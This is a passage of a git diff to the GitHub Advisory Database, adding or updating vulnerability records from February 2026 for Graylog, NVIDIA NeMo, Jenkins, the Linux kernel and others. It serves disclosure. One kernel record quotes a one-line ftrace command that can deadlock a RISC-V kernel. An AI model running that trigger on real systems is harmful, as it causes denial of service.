a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json index d65089f4f0cde..97ce98067f1f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json +++ b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5g82-gg27-r8vp", - "modified": "2026-02-16T18:31:28Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-16T18:31:28Z", "aliases": [ "CVE-2025-65715" ], "details": "An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-16T16:19:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json new file mode 100644 index 0000000000000..57e5554fcf326 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hp8-hwcv-h225", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1437" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1437" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json new file mode 100644 index 0000000000000..3a2b3697d87e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rm9-pcp8-m6v8", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33240" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33240" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json index 0554f3c56725a..08b97d1d07780 100644 --- a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json +++ b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json new file mode 100644 index 0000000000000..32324aa90966f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qr6-c44j-c793", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2655" + ], + "details": "A vulnerability was detected in ChaiScript up to 6.1.0. The impacted element is the function chaiscript::str_less::operator of the file include/chaiscript/chaiscript_defines.hpp. The manipulation results in use after free. The attack requires a local approach. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2655" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/632" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/632#issue-3827824936" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752788" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 6e844f0378d15..7b0a56750956f 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-288" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json new file mode 100644 index 0000000000000..a620971e97821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77vx-jc7r-586m", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23219" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/slab: Add alloc_tagging_slab_free_hook for memcg_alloc_abort_single\n\nWhen CONFIG_MEM_ALLOC_PROFILING_DEBUG is enabled, the following warning\nmay be noticed:\n\n[ 3959.023862] ------------[ cut here ]------------\n[ 3959.023891] alloc_tag was not cleared (got tag for lib/xarray.c:378)\n[ 3959.023947] WARNING: ./include/linux/alloc_tag.h:155 at alloc_tag_add+0x128/0x178, CPU#6: mkfs.ntfs/113998\n[ 3959.023978] Modules linked in: dns_resolver tun brd overlay exfat btrfs blake2b libblake2b xor xor_neon raid6_pq loop sctp ip6_udp_tunnel udp_tunnel ext4 crc16 mbcache jbd2 rfkill sunrpc vfat fat sg fuse nfnetlink sr_mod virtio_gpu cdrom drm_client_lib virtio_dma_buf drm_shmem_helper drm_kms_helper ghash_ce drm sm4 backlight virtio_net net_failover virtio_scsi failover virtio_console virtio_blk virtio_mmio dm_mirror dm_region_hash dm_log dm_multipath dm_mod i2c_dev aes_neon_bs aes_ce_blk [last unloaded: hwpoison_inject]\n[ 3959.024170] CPU: 6 UID: 0 PID: 113998 Comm: mkfs.ntfs Kdump: loaded Tainted: G W 6.19.0-rc7+ #7 PREEMPT(voluntary)\n[ 3959.024182] Tainted: [W]=WARN\n[ 3959.024186] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022\n[ 3959.024192] pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 3959.024199] pc : alloc_tag_add+0x128/0x178\n[ 3959.024207] lr : alloc_tag_add+0x128/0x178\n[ 3959.024214] sp : ffff80008b696d60\n[ 3959.024219] x29: ffff80008b696d60 x28: 0000000000000000 x27: 0000000000000240\n[ 3959.024232] x26: 0000000000000000 x25: 0000000000000240 x24: ffff800085d17860\n[ 3959.024245] x23: 0000000000402800 x22: ffff0000c0012dc0 x21: 00000000000002d0\n[ 3959.024257] x20: ffff0000e6ef3318 x19: ffff800085ae0410 x18: 0000000000000000\n[ 3959.024269] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n[ 3959.024281] x14: 0000000000000000 x13: 0000000000000001 x12: ffff600064101293\n[ 3959.024292] x11: 1fffe00064101292 x10: ffff600064101292 x9 : dfff800000000000\n[ 3959.024305] x8 : 00009fff9befed6e x7 : ffff000320809493 x6 : 0000000000000001\n[ 3959.024316] x5 : ffff000320809490 x4 : ffff600064101293 x3 : ffff800080691838\n[ 3959.024328] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0000d5bcd640\n[ 3959.024340] Call trace:\n[ 3959.024346] alloc_tag_add+0x128/0x178 (P)\n[ 3959.024355] __alloc_tagging_slab_alloc_hook+0x11c/0x1a8\n[ 3959.024362] kmem_cache_alloc_lru_noprof+0x1b8/0x5e8\n[ 3959.024369] xas_alloc+0x304/0x4f0\n[ 3959.024381] xas_create+0x1e0/0x4a0\n[ 3959.024388] xas_store+0x68/0xda8\n[ 3959.024395] __filemap_add_folio+0x5b0/0xbd8\n[ 3959.024409] filemap_add_folio+0x16c/0x7e0\n[ 3959.024416] __filemap_get_folio_mpol+0x2dc/0x9e8\n[ 3959.024424] iomap_get_folio+0xfc/0x180\n[ 3959.024435] __iomap_get_folio+0x2f8/0x4b8\n[ 3959.024441] iomap_write_begin+0x198/0xc18\n[ 3959.024448] iomap_write_iter+0x2ec/0x8f8\n[ 3959.024454] iomap_file_buffered_write+0x19c/0x290\n[ 3959.024461] blkdev_write_iter+0x38c/0x978\n[ 3959.024470] vfs_write+0x4d4/0x928\n[ 3959.024482] ksys_write+0xfc/0x1f8\n[ 3959.024489] __arm64_sys_write+0x74/0xb0\n[ 3959.024496] invoke_syscall+0xd4/0x258\n[ 3959.024507] el0_svc_common.constprop.0+0xb4/0x240\n[ 3959.024514] do_el0_svc+0x48/0x68\n[ 3959.024520] el0_svc+0x40/0xf8\n[ 3959.024526] el0t_64_sync_handler+0xa0/0xe8\n[ 3959.024533] el0t_64_sync+0x1ac/0x1b0\n[ 3959.024540] ---[ end trace 0000000000000000 ]---\n\nWhen __memcg_slab_post_alloc_hook() fails, there are two different\nfree paths depending on whether size == 1 or size != 1. In the\nkmem_cache_free_bulk() path, we do call alloc_tagging_slab_free_hook().\nHowever, in memcg_alloc_abort_single() we don't, the above warning will be\ntriggered on the next allocation.\n\nTherefore, add alloc_tagging_slab_free_hook() to the\nmemcg_alloc_abort_single() path.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23219" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8bc72587c79fe52c14732e16a766b6eded00707" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e6c53ead2d8fa73206e0a63e9cd9aea6bc929837" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e8af57e090790983591f6927b3d89ee6383f8c1e" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json new file mode 100644 index 0000000000000..521a2d425dac0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-787p-86v4-hhfg", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23217" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: trace: fix snapshot deadlock with sbi ecall\n\nIf sbi_ecall.c's functions are traceable,\n\necho \"__sbi_ecall:snapshot\" > /sys/kernel/tracing/set_ftrace_filter\n\nmay get the kernel into a deadlock.\n\n(Functions in sbi_ecall.c are excluded from tracing if\nCONFIG_RISCV_ALTERNATIVE_EARLY is set.)\n\n__sbi_ecall triggers a snapshot of the ringbuffer. The snapshot code\nraises an IPI interrupt, which results in another call to __sbi_ecall\nand another snapshot...\n\nAll it takes to get into this endless loop is one initial __sbi_ecall.\nOn RISC-V systems without SSTC extension, the clock events in\ntimer-riscv.c issue periodic sbi ecalls, making the problem easy to\ntrigger.\n\nAlways exclude the sbi_ecall.c functions from tracing to fix the\npotential deadlock.\n\nsbi ecalls can easiliy be logged via trace events, excluding ecall\nfunctions from function tracing is not a big limitation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23217" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b0d7f5f0c9f05f1b6d4ee7110f15bef9c11f9df0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b1f8285bc8e3508c1fde23b5205f1270215d4984" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json new file mode 100644 index 0000000000000..d00d13a95da0a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78p6-wh6m-9r9w", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60036" + ], + "details": "A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the UA.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60036" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json index 0e2e6f0b944ba..d9fc222a6c232 100644 --- a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json +++ b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-269" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json new file mode 100644 index 0000000000000..977856997d094 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85h6-5m3v-gx37", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-27099" + ], + "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27099" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3669" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json new file mode 100644 index 0000000000000..b8362687aacc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87ff-rq35-47jj", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-7630" + ], + "details": "Improper Restriction of Excessive Authentication Attempts, Improper Authentication vulnerability in Doruk Communication and Automation Industry and Trade Inc. Wispotter allows Password Brute Forcing, Brute Force.This issue affects Wispotter: from 1.0 before v2025.10.08.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7630" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0070" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json index c94330561f16b..77e61c9efb6e4 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-288" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json new file mode 100644 index 0000000000000..aa88979e8a389 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-933h-c422-j33j", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33241" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33241" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33241" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json new file mode 100644 index 0000000000000..6ec1cf8e8ebf9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9379-mwvr-7wxx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33245" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33245" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33245" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json index d6e16c284b1e6..aebddea98a329 100644 --- a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json +++ b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-964f-vc2f-ch6j", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70955" ], "details": "A Stack Overflow vulnerability was discovered in the TON Virtual Machine (TVM) before v2024.10. The vulnerability stems from the improper handling of vmstate and continuation jump instructions, which allow for continuous dynamic tail calls. An attacker can exploit this by crafting a smart contract with deeply nested jump logic. Even within permissible gas limits, this nested execution exhausts the host process's stack space, causing the validator node to crash. This results in a Denial of Service (DoS) for the TON blockchain network.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json new file mode 100644 index 0000000000000..b00448ac4ffec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5gg-v573-hv7f", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: don't WARN for connections on invalid channels\n\nIt's not clear (to me) how exactly syzbot managed to hit this,\nbut it seems conceivable that e.g. regulatory changed and has\ndisabled a channel between scanning (channel is checked to be\nusable by cfg80211_get_ies_channel_number) and connecting on\nthe channel later.\n\nWith one scenario that isn't covered elsewhere described above,\nthe warning isn't good, replace it with a (more informative)\nerror message.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/10d3ff7e5812c8d70300f6fa8f524009a06aa7e1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/99067b58a408a384d2a45c105eb3dce980a862ce" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json new file mode 100644 index 0000000000000..2120594c9543c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf26-rj67-f4wr", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1441" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1441" + 